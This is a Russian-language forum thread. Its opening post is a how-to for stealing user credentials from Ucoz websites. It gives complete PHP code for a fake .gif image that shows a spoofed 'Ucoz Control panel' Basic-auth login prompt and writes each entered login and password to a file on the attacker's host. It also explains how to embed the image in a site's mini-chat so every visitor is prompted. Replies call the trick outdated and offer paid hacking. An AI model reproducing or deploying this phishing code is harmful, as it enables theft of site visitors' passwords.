Скрипт для взлома сайта на Ucoz
-
Автор
Привет! Сегодня я вам расскажу об одном из способов взлома сайта на UCOZ’е. Каждый настоящий хакер может обнаружить достаточное количество уязвимостей на подобных сайтах и знает множество способов для взлома этих сайтов. Я надеюсь, что и я скоро стану таким =).
Итак, приступим...
В начале нужно зарегить host обязательно с поддержкой php (что-то вроде http://mywebsite.phphost.net). После завершения регистрации загружаем на ftp скрипт, а затем ставим права на файл goodsmile.gif и на .txt файл, например: pass.txt (сюда должны присылаться пароли пользователей взломанного сайта). Затем скачайте любой смайлик с расширением .gif (типа good.gif).
Затем откройте редактор Notepad и набираете следующее:
код скрипта<?
header("Content-type: image/gif");
$image = imagecreatefromgif(' goodsmile.gif');
if(!$_COOKIE['LOGON'])
{
$login = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
if(strlen($pass) <= 4 || !$login)
{
Header('HTTP/1.1 401 Unauthorized');
Header('WWW-Authenticate: Basic realm="Ucoz Control panel"');
}
elseif($login)
{
setcookie('LOGON',md5($pass));
$f = fopen('pass.txt', 'ab');
fwrite($f, $login." ||| ".$pass."\r\n");
fclose($f);
}
}
imagegif($image);
imagedestroy($image);
?>Как только вы всё напишите, сохраните файл под именем goodsmile, потом замените расширение на .gif.
Затем выберите любой UCOZ’овский сайт, например http://other.ucoz.ru/ как обычно, у них есть мини-чат, как правило с правой стороны. Далее - для начала регистрируетесь на сайте, затем в мини-чате вводите логин, а в сообщении напишите следующее:
Внимание, спойлер!Нажимаем ОК
. Если после этих манипуляций в мини-чате, вместо введенного сообщения появился смайлик - радуйтесь, потому что сайт - уязвимый. После этих манипуляций, у всех кто будет посещать данную страницу, (в моем примере это http:// other.ucoz.ru/) будет выплывать форма, в которой необходимо будет прописать свои логин и пароль. И у вас, при входе на данный сайт, эта форма также будет появляться. А все, введенные в эту форму логины и пароли будут отправляться в файл pass.txt, который вы создавали в самом начале и заливали на ftp.На некоторых сайтах описанная уязвимость может не пройти. Но стандартно созданный UCOZ’овский сайт, без дополнительных настроек уязвим. Всем большое спасибо за просмотр, надеюсь эта статья вам помогла
я ничего не выпрашываю но думаю за такое на + заслужыл
-
ты сам понял че написал?
-
Кароче удалю своё сообщение :D:
-
помоему всем по*** на взлом Ucoz.
-
Долго и нудно.Проще заплатить 900р(если позволяют финансы) и тебе взломают его
-
Взлом?
Не проще вставить скрипт который ворует пароли?
да и кто поверит...
но на всякий добавлю в закладки -
**ЕбашЪ_НефтЬ** **Долго и нудно.Проще заплатить 900р(если позволяют финансы) и тебе взломают его**За 900 рублей тебе пол всех созданных сайтов взломают:D:
-
старый способ.... такое дело моно с любым сайтом промутить если знать структуру хотябы частично
-
ахахха!!! Этот баг профиксили уже лет 5! он работает только на старых движках ucoz
-
Автор
взлом вк нада создам отдельную тему?
-
не надо
-
Dima_KO, давай:D:
-
**Dima_KO** взлом вк нада создам отдельную тему?хаха иди фапай чувак
-
cool, откуда ты знаешь? может у него приват система:D: и он не так выразился не ВК а Аков от ВК:D:
-
Этот бред работал лет 5 назад
Ты попробуй для начала
